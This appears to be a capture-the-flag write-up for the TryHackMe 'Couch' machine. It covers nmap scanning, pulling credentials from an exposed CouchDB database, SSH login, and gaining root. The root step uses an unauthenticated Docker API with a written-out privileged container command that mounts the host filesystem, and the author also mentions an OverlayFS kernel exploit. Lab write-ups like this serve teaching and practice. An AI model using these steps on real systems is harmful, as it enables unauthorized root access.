We always start with an nmap scan…..
Nmap -sC -p1-6000 -sV -oA <Target-IP>
┌──(muzec㉿Muzec-Security)-[~/Documents/TryHackMe/couch] └─$ nmap -sC -p1-6000 -sV -oA nmap 10.10.128.130 Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-01 03:45 EDT Stats: 0:04:58 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan Connect Scan Timing: About 42.33% done; ETC: 03:56 (0:06:46 remaining) Stats: 0:11:15 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan Connect Scan Timing: About 80.25% done; ETC: 03:59 (0:02:46 remaining) Nmap scan report for 10.10.128.130 Host is up (0.21s latency). Not shown: 5998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 34:9d:39:09:34:30:4b:3d:a7:1e:df:eb:a3:b0:e5:aa (RSA) | 256 a4:2e:ef:3a:84:5d:21:1b:b9:d4:26:13:a5:2d:df:19 (ECDSA) |_ 256 e1:6d:4d:fd:c8:00:8e:86:c2:13:2d:c7:ad:85:13:9c (ED25519) 5984/tcp open http CouchDB httpd 1.6.1 (Erlang OTP/18) |_http-server-header: CouchDB/1.6.1 (Erlang OTP/18) |_http-title: Site doesn't have a title (text/plain; charset=utf-8). Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 904.98 seconds
Now time to answer all the tasks questions it easy.
Scan the machine, how many ports are open?
Our Nmap only show 2 ports so the answer is
What’s is the database management system installed on the server?
Nmap result also show the database which the answer is
What port is the database management system running on?
We can see it from the Nmap result also answer is
What’s is the version of management system installed on the server?
What is path for the web administration tool for this database management system?
What is path for list all databases in the web browser of the database management system?
What is the credentials founed in the web administration tool?
Now it when the fun begin let navigate
http://10.10.128.130:5984/_utils/ yes it such a nice interface i know .
We all love secret lol so am checking first clicking on the secret database.
Now the key let hit it.
Boom we have the credentials.
Compromise the machine and locate user.txt
Now let use the credentials to log in SSH.
We have user.txt nice right time to get root.
Escalate privileges and obtain root.txt
127.0.0.1:2375 port 2375 so i try doing some research on it and i found out docker is runnig on the port nice is it possible to escape it let give it a try.
Remote API is running by default on 2375 port when enabled. The service by default will not require authentication allowing an attacker to start a privileged docker container. By using the Remote API one can attach hosts / (root directory) to the container and read/write files of the host’s environment.
Default port: 2375
Now for our payload
docker -H 127.0.0.1:2375 run --rm -it --privileged --net=host -v /:/root alpine let try running it on the target.
We are root nice and we have our root flag.
Probably Unintended Way To Obtain Root.
So after finishing the box i try to dig deeper on the kernal version.
Yes all running old version so let try the OverlayFS - Local Privilege Escalation - CVE-2021-3493 which i have already here on my blog OverlayFS - Local Privilege Escalation - CVE-2021-3493 (POC)
We are root and done.
Greeting From Muzec